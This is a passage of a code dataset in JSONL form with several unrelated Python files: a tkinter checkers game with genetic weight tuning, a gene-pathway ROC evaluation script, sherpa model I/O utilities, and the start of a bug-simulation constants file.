+{"seq_id":"389017470","text":"import tkinter as tk\nfrom shell2 import shell\nimport math\nimport validator\nimport time\nimport random\nimport bisect\nfrom collections import Counter\n\nclass userInterface():\n def __init__(self):\n self.winWidth = 525.0 # Width of Window\n self.winHeight = 525.0 # Height of Window\n self.canvas = None #Canvas for game board\n self.master = None #Actual Window\n self.submitBtn = None\n self.cancelBtn = None\n self.numPlayers = None\n self.color = None\n self.shell = None\n self.rightPanel = None\n self.coefficientsMin = [31.80383373845803, 639.2515612740601, -920.7441256913976, -145.7874428801877, -23.09329824973477, -1.6846182989301675, 0.0005257757963714672, 0.18158759326227403, 149.6959526974644, -3.8918229578659598]\n self.coefficientsAvg = [9.795873221263307, 18.631363834756527, -5.339231093167362, -9.285311869218145, -0.04377953419784824, -1.4222904052332954, 14.665482314471259, 2.043429450208848, 1.8821118121024654, 0.8792275836293832]\n self.currentMove = []\n self.tempBoard = []\n self.validMoves = None\n self.potentialMoves = []\n \n def buildWindow(self):\n self.master.destroy()\n self.master = tk.Tk()\n mainGrid = tk.Entry(self.master)\n mainGrid.grid(row=2,column=2)\n \n canvPan = tk.Canvas(self.master, width=self.winWidth, height=self.winHeight)\n canvPan.grid(row=1, column=2)\n #rightPanel = tk.Text(canvPan, width = 20, height = 25)\n self.rightPanel = tk.Listbox(canvPan, width = 20, height = 35)\n scrollBar = tk.Scrollbar(canvPan,orient=\"vertical\", command=self.rightPanel.yview)\n self.rightPanel.configure(yscrollcommand=scrollBar.set, state=\"normal\")\n scrollBar.pack(side=\"right\", fill=\"y\")\n self.rightPanel.pack(side=\"right\")\n \n self.canvas = tk.Canvas(self.master, width=self.winWidth, height=self.winHeight)\n self.canvas.grid(row = 1, column = 1)\n self.canvas.bind('', self.clickEvent)\n \n #buttonGrid = tk.Entry(mainGrid)\n #buttonGrid.grid(row=1, column=2)\n self.submitBtn = tk.Button(mainGrid, text=\"Submit\")\n self.submitBtn.grid(row=1, column=2)\n self.submitBtn.bind(\"\", self.submitEvent)\n self.cancelBtn = tk.Button(mainGrid, text=\"Cancel\")\n self.cancelBtn.grid(row=1, column=1)\n self.cancelBtn.bind(\"\", self.cancelEvent)\n \n def display(self, board, highlight):\n self.canvas.delete(\"all\")\n self.drawBoard()\n if not highlight == None:\n self.highlightBoard(highlight)\n self.drawPieces(board)\n \n def drawBoard(self):\n numRows = 8 #8x8 Board\n numCols = 8\n inc = self.winWidth/numRows #Pixels to increment by\n color1 = '#%02x%02x%02x' % (220, 167, 108)\n color2 = '#%02x%02x%02x' % (114, 68, 41)\n for i in range(numRows): #For Every Row\n for j in range(numCols):#For Every Column\n x = i*inc #(x,y)\n y = j*inc\n if i%2 == 0 and j%2 == 0: #i, j both even => Color 1\n self.canvas.create_rectangle(x,y,(i+1)*inc,(j+1)*inc,fill=color1 )\n \n elif i%2!=0 and j%2 != 0: #i, j both odd => Color 1\n self.canvas.create_rectangle(x,y,(i+1)*inc,(j+1)*inc,fill=color1 )\n else:\n self.canvas.create_rectangle(x,y,(i+1)*inc,(j+1)*inc,fill=color2 )\n squareX = math.floor(x/inc)\n squareY = math.floor(y/inc)\n if squareX%2==0: \n squareNum = (squareX)/2 + 1 + 4*squareY\n else:\n squareNum = (squareX-1)/2 + 1 + 4*squareY\n self.canvas.create_text(x+.15*inc, y+inc*.9, text=int(squareNum))\n \n def highlightBoard(self, squares):\n highlightColor = '#%02x%02x%02x' %(0,0,100)\n inc = self.winWidth/8\n for square in squares:\n y = math.floor((square-1)/4)\n x = (square-1)%4*2+1 - y%2\n self.canvas.create_rectangle(x*inc,y*inc, (x+1)*inc, (y+1)*inc, fill=highlightColor)\n \n def drawPieces(self, board):\n blackColor = '#%02x%02x%02x' % (75, 75, 75)\n redColor = '#%02x%02x%02x' % (105, 0, 0)\n blackKingColor = '#%02x%02x%02x' % (105, 105, 105)\n redKingColor = '#%02x%02x%02x' % (135, 0, 0)\n inc = self.winWidth/8\n for i in range(len(board)):\n cy = math.floor((i)/4) #Convert current position to world position\n cx = (i)%4*2+1 - cy%2\n cy=(inc/2.0) + cy*inc\n cx=(inc/2.0) + cx*inc\n if board[i]==1 or board[i]==3: #Determine Color\n self.canvas.create_oval(cx-(inc/2.0)*.75, cy-(inc/2.0)*.75, cx+(inc/2.0)*.75, cy+(inc/2.0)*.75, fill = blackColor)\n if board[i] > 2: #Check for a king\n self.canvas.create_oval(cx-(inc/2.0)*.55, cy-(inc/2.0)*.55, cx+(inc/2.0)*.55, cy+(inc/2.0)*.55, fill=blackKingColor)\n elif board[i]==2 or board[i]==4:\n self.canvas.create_oval(cx-(inc/2.0)*.75, cy-(inc/2.0)*.75, cx+(inc/2.0)*.75, cy+(inc/2.0)*.75, fill = redColor)\n if board[i] > 2: #Other color king\n self.canvas.create_oval(cx-(inc/2.0)*.55, cy-(inc/2.0)*.55, cx+(inc/2.0)*.55, cy+(inc/2.0)*.55, fill=redKingColor)\n \n def getColor(self):\n color1 = '#%02x%02x%02x' % (75, 75, 75)\n color2 = '#%02x%02x%02x' % (105, 0, 0)\n self.master.destroy()\n self.master = tk.Tk()\n colorText = tk.Label(self.master, text = \"Select Color\",font=(\"Helvetica\", 15)).pack()\n self.canvas = tk.Canvas(self.master, width=self.winWidth, height=200)\n self.canvas.bind(\"\", self.colorSelectEvent)\n self.canvas.pack()\n #Top Left, bottom right\n self.canvas.create_oval(0, 0, 200,200, fill=color1)\n self.canvas.create_oval(200, 0, 400,200, fill=color2)\n \n def numPlayerSelect(self, numPlayers):\n self.numPlayers = numPlayers\n if numPlayers==0:\n self.playGame()\n elif numPlayers==1:\n self.getColor()\n else: #2 Player\n self.color = 1\n self.playGame()\n \n def colorSelectEvent(self, event):\n radius = 100\n #r and center at position (x0,y0) and a point (x1,y1)\n #Math.sqrt((x1-x0)*(x1-x0) + (y1-y0)*(y1-y0)) < r \n if math.sqrt(math.pow((event.x - 100),2) + math.pow((event.y - 100), 2)) < radius:\n #print(\"Black\")\n self.color = -1\n elif math.sqrt(math.pow((event.x - 300),2) + math.pow((event.y - 100), 2)) < radius:\n #print(\"Red\")\n self.color= 1\n if not self.color == None:\n self.playGame()\n \n def clickEvent(self, event):\n if self.numPlayers==2 or self.color == self.shell.turn:\n inc = self.winWidth/8\n # Find which square was clicked\n x = math.floor(event.x/inc)\n y = math.floor(event.y/inc)\n if x%2 != 0 and y%2 == 0 or x%2==0 and y%2!=0:\n if x%2==0: \n squareNum = (x)/2 + 1 + 4*y\n self.currentMove.append(int(squareNum))\n else:\n squareNum = (x-1)/2 + 1 + 4*y\n self.currentMove.append(int(squareNum))\n self.updateMove()\n\n def submitEvent(self, event):\n if len(self.potentialMoves)==1 and self.currentMove == self.potentialMoves[0]:\n self.shell.board = list(self.tempBoard)\n self.shell.turn *= -1\n self.addMoveToWindow(self.currentMove)\n self.currentMove = []\n self.display(self.tempBoard, None)\n self.validMoves= validator.getValidMoves(self.tempBoard, self.shell.turn)\n self.master.update()\n if len(self.validMoves)==0:\n self.gameOver(self.shell.turn*-1)\n elif not self.color == self.shell.turn:\n \n \n \n #engineMove = self.shell.engineMini(self.coefficientsMin)\n engineMove = self.shell.engineAvge(self.coefficientsAvg)\n \n \n \n self.display(self.shell.board, engineMove)\n self.addMoveToWindow(engineMove)\n self.master.update()\n time.sleep(2.5)\n self.tempBoard = list(self.shell.board)\n self.display(self.tempBoard, None)\n self.validMoves= validator.getValidMoves(self.tempBoard, self.shell.turn)\n if len(self.validMoves)==0:\n self.gameOver(self.shell.turn*-1)\n self.master.mainloop()\n \n def cancelEvent(self, event):\n if self.numPlayers==2 or self.color == self.shell.turn:\n self.tempBoard = list(self.shell.board)\n self.currentMove = []\n self.display(self.tempBoard, None)\n \n def updateMove(self):\n self.potentialMoves = self.shell.getPotentialMoves(self.validMoves, self.currentMove) #List of potential Moves\n valid = len(self.potentialMoves) #Valid indicator\n if valid == 0:\n self.currentMove = []\n self.tempBoard= list(self.shell.board)\n self.display(self.tempBoard, None)\n else:\n currLength = len(self.currentMove)\n if currLength!=1:\n self.tempBoard = self.shell.makeMove(self.tempBoard, self.currentMove[currLength-2], self.currentMove[currLength-1])\n self.display(self.tempBoard, self.shell.toHighlight(self.potentialMoves, self.currentMove)) #Display the board and the highlighted squares\n \n def getGameInfo(self):\n color1 = '#%02x%02x%02x' % (220, 167, 108)\n color2 = '#%02x%02x%02x' % (114, 68, 41)\n self.master = tk.Tk()\n numPlayerText = tk.Label(self.master, text = \"Select Number of Players\",font=(\"Helvetica\", 15)).pack()\n button0 = tk.Button(self.master, text=\"0\",font=(\"Helvetica\", 15), command= lambda: self.numPlayerSelect(0), width = 25, height = 5, bg=color1)\n button0.pack(padx=5, pady=10, side=\"left\")\n button1 = tk.Button(self.master, text=\"1\",font=(\"Helvetica\", 15), command= lambda: self.numPlayerSelect(1), width = 25, height = 5, bg=color2)\n button1.pack(padx=5, pady=10, side=\"left\")\n button2 = tk.Button(self.master, text=\"2\",font=(\"Helvetica\", 15), command= lambda: self.numPlayerSelect(2), width = 25, height = 5, bg=color1)\n button2.pack(padx=5, pady=10, side=\"left\")\n self.master.mainloop()\n \n def playGame(self):\n self.buildWindow()\n self.shell = shell()\n self.tempBoard = list(self.shell.board)\n self.display(self.tempBoard, None)\n self.validMoves = validator.getValidMoves(self.tempBoard, self.shell.turn)\n #self.master.mainloop()\n self.master.update()\n self.master.update_idletasks()\n if self.numPlayers == 0:\n winner = None\n while not winner:\n if self.shell.turn == -1:\n engineMove = self.shell.engineMini(self.coefficientsMin)\n #engineMove = self.shell.engineMove()\n else:\n engineMove = self.shell.engineAvge(self.coefficientsAvg)\n if engineMove:\n self.display(self.shell.board, engineMove)\n self.addMoveToWindow(engineMove)\n self.master.update()\n time.sleep(.25)\n self.display(self.shell.board, None)\n self.master.update()\n else:\n winner = self.shell.turn\n self.gameOver(self.shell.turn)\n \n elif self.numPlayers == 1:\n if not self.color == self.shell.turn:\n \n \n #engineMove = self.shell.engineMini(self.coefficientsMin)\n engineMove = self.shell.engineAvge(self.coefficientsAvg)\n \n \n self.display(self.shell.board, engineMove)\n self.addMoveToWindow(engineMove)\n self.master.update()\n time.sleep(2.5)\n self.tempBoard = list(self.shell.board)\n self.display(self.tempBoard, None)\n self.validMoves = validator.getValidMoves(self.tempBoard, self.shell.turn)\n else:\n self.validMoves = validator.getValidMoves(self.tempBoard, self.shell.turn)\n \n \n def prepareGenetic(self, numGames):\n self.buildWindow()\n self.drawBoard()\n self.runGenetic(numGames)\n \n def runGenetic(self, iterations):\n coefficients = []\n subCoef = [17.870608421051116, 382.104087415839, -197.8760037558925, -99.5791198228507, -19.85666468717079, -7.1078325370316655, -0.000830428359955046, -1.4547279971100042, 88.53222312332956, -5.200920724125826]\n coefficients.append(subCoef)\n subCoef = [18.336001802421958, 385.42292624812217, -136.32606766487388, -98.46436321058157, 1.7976404507180632e-05, -6.829730767431356, 0.004564062720315796, -1.454722101775636, 87.20600891668526, -5.270479535271417]\n coefficients.append(subCoef)\n subCoef = [18.24292312614779, 384.7591584816655, -148.6360548830776, -98.68731453303539, -19.856640718631446, -6.885351121351418, 0.003485164504261628, -1.4547232808425097, 87.47125175801412, -5.256567773042299]\n coefficients.append(subCoef)\n subCoef = [64.93647287229193, 8.743705836701121, -59.053142534306915, -69.22783191460911, -34.1739292072367, 78.7987847453075, 3.1154154111278984, 52.60740314890384, 69.75743281616226, -84.14429145864864]\n coefficients.append(subCoef)\n subCoef = [18.14984444987362, 384.09539071520885, -160.9460421012813, -98.91026585548921, 5.992134836318996e-06, 6.94097147527148, 0.0024062662882074594, -1.4547244599093834, 87.73649459934298, -5.242656010813181]\n coefficients.append(subCoef)\n subCoef = [18.24292312614779, 384.7591584816655, -148.6360548830776, -98.68731453303539, -19.856640718631446, -6.885351121351418, 0.003485164504261628, -1.4547232808425097, 87.47125175801412, -5.256567773042299]\n coefficients.append(subCoef)\n subCoef = [18.05676577359945, 383.43162294875225, -173.25602931948504, -99.13321717794304, 19.85665270290112, -6.996591829191542, 0.001327368072153291, -1.454725638976257, 88.00173744067183, -5.2287442485840625]\n coefficients.append(subCoef)\n subCoef = [18.24292312614779, 384.7591584816655, -148.6360548830776, -98.68731453303539, -19.856640718631446, -6.885351121351418, 0.003485164504261628, -1.4547232808425097, 87.47125175801412, -5.256567773042299]\n coefficients.append(subCoef)\n \n \n #for i in range(7):\n #subCoef = []\n #for j in range(10):\n #if j in [0,1,8]:\n #ranC = random.uniform(0,100)\n #elif j in [2,3,9]:\n #ranC = random.uniform(-100,0)\n #else:\n #ranC = random.uniform(-100,100) \n #subCoef.append(ranC)\n #coefficients.append(subCoef)\n \n for i in range(iterations):\n results = []\n gameNum = 1\n for j in range(0,len(coefficients)-1,2): #For each Coefficient set\n self.playMatch(coefficients,j,j+1,results,i,gameNum)\n gameNum = gameNum + 1\n \n winBrackResults = []\n for j in range(0, 4, 2):\n self.playMatch(coefficients, results[j][3], results[j+1][3], winBrackResults, i, gameNum)\n gameNum = gameNum + 1\n \n loserBrackResults = []\n for j in range(4, 8, 2):\n self.playMatch(coefficients, results[j][3], results[j+1][3], loserBrackResults, i, gameNum)\n gameNum = gameNum + 1\n \n #breed top 2 in win Bracket\n parentA = coefficients[winBrackResults[0][3]]\n parentB = coefficients[winBrackResults[1][3]]\n child = []\n for j in range(len(parentA)):\n child.append((parentA[j]+parentB[j])/2.0)\n #child.append(random.uniform(parentA[j], parentB[j]) \n #if random.random()<.5:\n oldChild = list(child)\n rndm = random.random()\n if rndm < .1: #friendly pawn\n child[0] = self.mutate(child[0], False) \n elif rndm <.2: # friendly king\n child[1] = self.mutate(child[1], False) \n elif rndm <.3: #enemy pawn\n child[2] = self.mutate(child[2], False) \n elif rndm <.4: #enemy king\n child[3] = self.mutate(child[3], False) \n elif rndm <.5: #safe pawns diff\n child[4] = self.mutate(child[4], True) \n elif rndm <.6: #safe kings diff\n child[5] = self.mutate(child[5], True) \n elif rndm <.7: #pawn moves diff\n child[6] = self.mutate(child[6], True) \n elif rndm <.8: #king moves diff\n child[7] = self.mutate(child[7], True) \n elif rndm <.9: #enemy promotion tiles diff\n child[8] = self.mutate(child[8], False) \n else: #pawn distance diff\n child[9] = self.mutate(child[9], False)\n \n children = [oldChild, child]\n childVsMutatedChildResults = []\n self.playMatch(children, 0, 1, childVsMutatedChildResults,i, gameNum)\n gameNum = gameNum + 1\n if childVsMutatedChildResults[0][3] == 0: #Old Child is better\n child = list(oldChild)\n print(\"Old Child wins\")\n \n bestLoserResults = []\n #Play last 2 losers in loser bracket\n #player1 = coefficients[loserBrackResults[2][3]]\n #player2 = coefficients[loserBrackResults[3][3]]\n self.playMatch(coefficients, loserBrackResults[2][3], loserBrackResults[3][3], bestLoserResults, i, gameNum)\n gameNum = gameNum + 1\n winner = bestLoserResults[0][3]\n \n #Loser of losers play bred \n coefficients.append(child)\n loserChildResults = []\n self.playMatch(coefficients, winner, 8, loserChildResults, i, gameNum)\n gameNum = gameNum + 1\n \n if loserChildResults[0][3]==8:\n coefficients[winner] = child\n coefficients = coefficients[:-1]\n \n weightFile = open('weights.txt', 'w')\n for j in range(len(results)):\n weightFile.write(str(coefficients[j])+'\\n')\n weightFile.write(str(results[j]) + '\\n')\n weightFile.write('\\n')\n weightFile.close()\n \n newCoefficients = []\n maxIndex = len(coefficients)-1\n while maxIndex >=0:\n swapIndex= random.randint(0,maxIndex)\n temp = list(coefficients[swapIndex])\n newCoefficients.append(temp)\n coefficients[swapIndex]= list(coefficients[maxIndex])\n maxIndex -=1\n coefficients = list(newCoefficients)\n \n def playMatch(self,coefficients,p1Index,p2Index,results, iteration, gameNum):\n game1 = []\n game2 = []\n winners = []\n player1 = coefficients[p1Index]\n player2 = coefficients[p2Index]\n print(\"Iteration: %s, Game: %s, Match: 1\"%(iteration,gameNum)) \n [winner, numMoves]= self.tourneyGame(player1, player2)\n self.determineGameResults(winner, numMoves, p1Index, p2Index, game1)\n winners.append(winner)\n print(\"Iteration: %s, Game: %s, Match: 2\"%(iteration,gameNum))\n [winner, numMoves] = self.tourneyGame(player2, player1)\n self.determineGameResults(winner, numMoves, p2Index, p1Index, game2)\n winners.append(winner)\n if winners[0] == winners[1]: #same color won both games\n if random.random() < .5: #Take random winner\n winner = game1[0]\n loser = game1[1]\n else:\n winner = game1[1]\n loser = game1[0]\n elif winners[0]==2 or winners[1]==2: #There has been a tie\n if winners[0]==2: #Find The game with no tie and make that the winnner\n winner = game2[0]\n loser = game2[1]\n else:\n winner = game1[0]\n loser = game1[1] \n else:\n winner = game1[0]\n loser = game1[1]\n bisect.insort_left(results, winner)\n bisect.insort_left(results, loser)\n \n def mutate(self, value, flip):\n rndm = random.random()\n if flip:\n if rndm < .4:\n value *=2\n elif rndm < .8:\n value*=.5\n else:\n value*=-1\n else:\n if rndm <.5:\n value *=2\n else:\n value*=.5\n return value\n \n \n def determineGameResults(self,winner,numMoves,redIndex,blackIndex,results):\n pieceCount = Counter(self.shell.board)\n blackRemain = (pieceCount[1] + pieceCount[3]) \n redRemain = (pieceCount[2] + pieceCount[4])\n if winner == 1:\n winnerResults = (0, numMoves,blackRemain-redRemain, redIndex)\n loserResults = (2, numMoves,redRemain-blackRemain, blackIndex)\n elif winner == -1:\n winnerResults = (0, numMoves,redRemain-blackRemain, blackIndex)\n loserResults = (2, numMoves,blackRemain-redRemain, redIndex)\n else: #Tie\n if redRemain > blackRemain:\n winnerResults = (1, blackRemain-redRemain,numMoves, redIndex)\n loserResults = (1, redRemain-blackRemain,numMoves, blackIndex)\n else:\n winnerResults = (1, redRemain-blackRemain,numMoves, blackIndex)\n loserResults = (1, blackRemain-redRemain,numMoves,redIndex)\n bisect.insort_left(results, winnerResults)\n bisect.insort_left(results, loserResults)\n \n def tourneyGame(self, player1, player2):\n numMoves = 0\n self.shell = shell()\n #self.display(self.shell.board, None)\n history = []\n history.append(tuple(self.shell.board))\n winner = None\n while not winner: #Play the game\n if self.shell.turn == 1:\n engineMove = self.shell.engineMove2(player1)\n else:\n engineMove = self.shell.engineMove2(player2)\n numMoves +=1\n if engineMove:\n #self.display(self.shell.board, engineMove)\n #self.master.update()\n #time.sleep(.1)\n #self.display(self.shell.board, None)\n #self.master.update()\n tempBoard = tuple(self.shell.board)\n for boardState in history:\n if tempBoard == boardState: #Tie\n winner = 2\n break\n history.append(tempBoard)\n else:\n winner = self.shell.turn\n self.gameOver(winner)\n return [winner, numMoves]\n \n \n def addMoveToWindow(self, move):\n if self.shell.turn == 1:\n self.rightPanel.insert('end', 'Black: ' + str(move))\n else:\n self.rightPanel.insert('end', 'Red: ' + str(move))\n self.rightPanel.see('end') \n \n def gameOver(self, winner):\n if winner == 1:\n self.rightPanel.insert('end', 'Red Wins')\n elif winner == 2:\n self.rightPanel.insert('end', 'Tie')\n else:\n self.rightPanel.insert('end', 'Black Wins')\n self.rightPanel.see('end')\n \n \nif __name__ == \"__main__\":\n ui = userInterface()\n ui.getGameInfo()\n #ui.prepareGenetic(10000)\n \n","sub_path":"src/userInterface2.py","file_name":"userInterface2.py","file_ext":"py","file_size_in_byte":24420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"319995315","text":"# plot clime roc\nfrom math import sqrt\n\nimport pandas as pd\nimport os\nimport multiprocessing\nimport numpy as np\n\n# get tpr and fpr\nimport sys\n\n\ndef get_input_clime_name(genes):\n input_pathway = pd.read_csv(genes, sep='\\t')\n p_name = list(input_pathway.Symbol)\n return p_name\n\n\ndef tans_predict(pre_path, p_name):\n # read predict\n data = pd.read_csv(pre_path, sep='\\t')\n # get ecm+ and llr\n re = data[['Gene Symbol', 'LLR']][data['ECM/ECM+'].isin(['ECM+'])]\n\n # if p_name not in predict result\n re_symbol = list(re['Gene Symbol'])\n re_llr = list(re['LLR'])\n if p_name[0] not in re_symbol:\n re_symbol.append(p_name[0])\n\n re_llr.append(0)\n # change col names\n dic = {'name': re_symbol, 'score': re_llr}\n pre = pd.DataFrame(dic)\n pre = pre.sort_values('score', ascending=False)\n\n return pre\n\n\ndef get_tpr_fpr(p_name: list,\n n_name: list,\n threshold: int,\n pre: 'dataframe', ) -> \"The tpr and fpr\":\n \"\"\"\n Get fpr and tpr\n :param p_name: Positive genes\n :param n_name: Negative genes\n :param threshold: The threshold\n :param pre: The predict dataframe\n :return: tpr and fpr\n \"\"\"\n tp = len([x for x in p_name if x in list(pre.name[pre.score >= threshold])])\n fp = len([x for x in n_name if x in list(pre.name[pre.score >= threshold])])\n tn = len([x for x in n_name if x in list(pre.name[pre.score < threshold])])\n fn = len([x for x in p_name if x in list(pre.name[pre.score < threshold])])\n # print((tp, fp, tn, fn))\n\n tpr = tp / (tp + fn)\n\n fpr = fp / (fp + tn)\n if tp + fp == 0:\n precision = 0\n else:\n precision = tp / (tp + fp)\n\n return precision, tpr, fpr, (tp, fp, tn, fn) # do every threshold\n\n\n# kegg_matrix = pd.read_csv('/home/yangfang/PCSF/clime_roc/all_kegg_matrix.txt', sep='\\t')\n#\n# all_genes = list(kegg_matrix.Symbol)\n\n\n\n\n# get leave genes names\ndef get_leave_genes(path):\n leave_genes = {}\n with open(path) as f:\n for i in f:\n line = i.strip().split('\\t')\n leave_genes[line[0]] = line[1]\n return leave_genes\n\n\n\n\ndef run_roc(pred, i):\n input_gene_file_names = pred[:-6]\n\n input_gene_abs = '/home/yangfang/PCSF/clime_roc/inputgene_10/'\n input_gene_file = os.path.join(input_gene_abs, input_gene_file_names)\n # get leave one genes names as positive\n leave_genes = get_leave_genes('/home/yangfang/PCSF/clime_roc/10_pathway_leave_name.txt')\n p_names = [leave_genes[input_gene_file_names]]\n\n # get negative genes names\n input_clime = get_input_clime_name(input_gene_file)\n\n # append positive genes\n input_clime.append(p_names)\n input_genes = pd.read_csv('/home/yangfang/PCSF/clime_roc/10pathway.txt', sep='\\t')\n\n all_pathway_genes = list(input_genes['Symbol'])\n\n n_names = [var for var in all_pathway_genes if var not in input_clime]\n pre = tans_predict(os.path.join('/home/yangfang/PCSF/clime_roc/test_10', pred), p_names)\n\n precision, tpr, fpr, all_r = get_tpr_fpr(p_names, n_names, i, pre)\n return (precision, tpr, fpr, all_r)\n\n\n\nif __name__ == '__main__':\n\n all_tpr_fpr_precision = []\n all_fn = []\n thr = [i / 2.0 for i in range(60)]\n all_pre_file = os.listdir('/home/yangfang/PCSF/clime_roc/test_10')\n for i in reversed(thr):\n\n each_result = []\n\n for j in range(10):\n each_pathway = [x for x in all_pre_file if x.startswith(str(j))]\n tasks = [(x, y) for x in each_pathway for y in [i]]\n cores = 8\n pool = multiprocessing.Pool(processes=cores)\n # map\n result = pool.starmap(run_roc, tasks)\n pool.close()\n pool.join()\n # get each result\n precision_tpr_fpr = [var[:3] for var in result]\n all_r = [var[-1] for var in result]\n # trans to array\n precision_tpr_fpr_array = np.array(precision_tpr_fpr)\n # get each mean\n mean_p_tpr_fpr_array = precision_tpr_fpr_array.mean(axis=0)\n each_result.append(mean_p_tpr_fpr_array)\n # get all tpr fpr\n all_fn.extend(all_r)\n\n each_result_array = np.array(each_result)\n all_mean_p_t_f_array = each_result_array.mean(axis=0)\n mean_precision = all_mean_p_t_f_array[0]\n mean_tpr = all_mean_p_t_f_array[1]\n mean_fpr = all_mean_p_t_f_array[2]\n print(mean_precision, mean_tpr, mean_fpr)\n all_tpr_fpr_precision.append((mean_tpr, mean_fpr, mean_precision))\n\n f = open('/home/yangfang/PCSF/clime_roc/3_pathway_tpr_fpr_precision_n_in_10_update.txt', 'a')\n f.write('tpr\\tfpr\\tprecision\\n')\n\n for i in all_tpr_fpr_precision:\n f.write('{0}\\t{1}\\t{2}\\n'.format(i[0], i[1], i[2]))\n\n f.close()\n\n f2 = open('/home/yangfang/PCSF/clime_roc/3_pathway_tp_fp_tn_fn_n_in_10.txt_update', 'a')\n f2.write('tp\\tfp\\ttn\\tfn\\n')\n\n for j in all_fn:\n f2.write('{0}\\t{1}\\t{2}\\t{3}\\n'.format(j[0], j[1], j[2], j[3]))\n f2.close()\n","sub_path":"PaPr/clime/plot_roc.py","file_name":"plot_roc.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"437319554","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Morphology utility functions (mostly I/O).\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport json\n\n__all__ = ['read_ascii', 'read_json', 'write_all', 'write_ascii', 'write_json']\n\n\ndef _name(ii):\n \"\"\"Use this to make the model name for source number `ii`.\"\"\"\n return 'normgauss2d.source_{0:02d}'.format(ii)\n\n\ndef _set(name, par, val):\n \"\"\"Set a source parameter.\"\"\"\n import sherpa.astro.ui as sau\n sau.set_par('{name}.{par}'.format(**locals()), val)\n # try:\n # exec(name + '.' + par + '=' + str(val))\n # except Exception as e:\n # print e\n\n\ndef _model(source_names):\n \"\"\"Build additive model string for Gaussian sources.\"\"\"\n return ' + '.join(['normgauss2d.' + name for name in source_names])\n\n\ndef read_json(source, setter):\n \"\"\"Read from JSON file.\"\"\"\n if isinstance(source, dict):\n # Assume source is a dict with correct format\n d = source\n else:\n # Assume source is a filename with correct format\n d = json.load(open(source))\n source_names = d.keys()\n model = _model(source_names)\n setter(model)\n for name, pars in d.items():\n for par, val in pars.items():\n _set(name, par, val)\n\n\ndef read_ascii(filename, setter):\n \"\"\"Read from ASCII file.\"\"\"\n lines = open(filename).readlines()\n tokens = [line.split() for line in lines]\n names = set([token[0] for token in tokens])\n pars = set([token[1] for token in tokens])\n vals = set([token[2] for token in tokens])\n\n model = _model(names)\n setter(model)\n for name, par, val in zip(names, pars, vals):\n _set(name, par, val)\n\n\ndef write_json(pars, filename):\n \"\"\"Write to JSON file.\"\"\"\n d = {}\n\n for par in pars:\n if not par.modelname in d.keys():\n d[par.modelname] = {}\n\n d[par.modelname][par.name] = par.val\n\n json.dump(d, open(filename, 'w'), sort_keys=True, indent=4)\n\n\ndef write_ascii(pars, filename):\n \"\"\"Write to ASCII\"\"\"\n fh = open(filename, 'w')\n for par in pars:\n fh.write('{0} {1} {2}\\n'.format(par.modelname, par.name, par.val))\n\n\ndef write_all(filename='results.json'):\n \"\"\"Dump source, fit results and conf results to a JSON file.\n\n http://www.astropython.org/snippet/2010/7/Save-sherpa-fit-and-conf-results-to-a-JSON-file\n \"\"\"\n import sherpa.astro.ui as sau\n out = dict()\n\n if 0:\n src = sau.get_source()\n src_par_attrs = ('name', 'frozen', 'modelname', 'units', 'val', 'fullname')\n out['src'] = dict(name=src.name,\n pars=[dict((attr, getattr(par, attr)) for attr in src_par_attrs)\n for par in src.pars])\n\n try:\n fit_attrs = ('methodname', 'statname', 'succeeded', 'statval', 'numpoints', 'dof',\n 'rstat', 'qval', 'nfev', 'message', 'parnames', 'parvals')\n fit = sau.get_fit_results()\n out['fit'] = dict((attr, getattr(fit, attr)) for attr in fit_attrs)\n except Exception as err:\n print(err)\n\n try:\n conf_attrs = ('datasets', 'methodname', 'fitname', 'statname', 'sigma', 'percent',\n 'parnames', 'parvals', 'parmins', 'parmaxes', 'nfits')\n conf = sau.get_conf_results()\n out['conf'] = dict((attr, getattr(conf, attr)) for attr in conf_attrs)\n except Exception as err:\n print(err)\n\n try:\n covar_attrs = ('datasets', 'methodname', 'fitname', 'statname', 'sigma', 'percent',\n 'parnames', 'parvals', 'parmins', 'parmaxes', 'nfits')\n covar = sau.get_covar_results()\n out['covar'] = dict((attr, getattr(covar, attr)) for attr in covar_attrs)\n except Exception as err:\n print(err)\n\n if 0:\n out['pars'] = []\n for par in src.pars:\n fullname = par.fullname\n if any(fullname == x['name'] for x in out['pars']):\n continue # Parameter was already processed\n outpar = dict(name=fullname, kind=par.name)\n\n # None implies no calculated confidence interval for Measurement\n parmin = None\n parmax = None\n try:\n if fullname in conf.parnames: # Confidence limits available from conf\n i = conf.parnames.index(fullname)\n parval = conf.parvals[i]\n parmin = conf.parmins[i]\n parmax = conf.parmaxes[i]\n if parmin is None:\n parmin = -float('inf') # None from conf means infinity, so set accordingly\n if parmax is None:\n parmax = float('inf')\n elif fullname in fit.parnames: # Conf failed or par is uninteresting and wasn't sent to conf\n i = fit.parnames.index(fullname)\n parval = fit.parvals[i]\n else: # No fit or conf value (maybe frozen)\n parval = par.val\n except Exception as err:\n print(err)\n\n out['pars'].append(outpar)\n if filename is None:\n return out\n else:\n json.dump(out, open(filename, 'w'), sort_keys=True, indent=4)\n","sub_path":"gammapy/image/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"43661990","text":"__author__ = 'nacho'\n\n\n# *************** BUG CONSTANTS ***************\n# Index of memory blocks and pointer registers\nHEAP=0\nSTACK=1\nCODE=2\n# Index of other registers\nCOMM=3\nENER=4\nMATU=5\nOFFS=6\nDIET=7\nSHRE=8\n\n\n# Number of registers. The three registers are block pointers (stack, code, heap)\nNREGS=10\n# Number of memory blocks\nNBLOCKS=3\n# Size of memory blocks\nMAX_MEM=100\n\n# Max Energy\nENERGY=100\n\n# Init Energy\nINITENERGY=50\n\n\n# Percentage of energy to share\nSHARENERGY=50\n# Number of descendants\nOFFSPRING=2\n# Max size of the mutation\nDELTA=3\n\n# Diet Type\nHERB=0\nCARN=1\n# OMNI has to be the last one\nOMNI=2\n\n\nOPS=['RST', # Resets the PC\n 'NOP', # NO Operation\n 'PUSH', # PUSH n ; Pushes n into the STACK\n 'ST', # ST Reg ; Copy value of register to stack\n 'LD', # LD Reg ; Copy value of stack to register\n 'STM', # STM Address ; Copy value in stack to heap address\n 'LDM', # LDM Address ; 